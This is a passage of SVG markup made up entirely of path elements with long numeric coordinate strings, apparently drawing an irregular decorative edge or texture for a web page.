d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2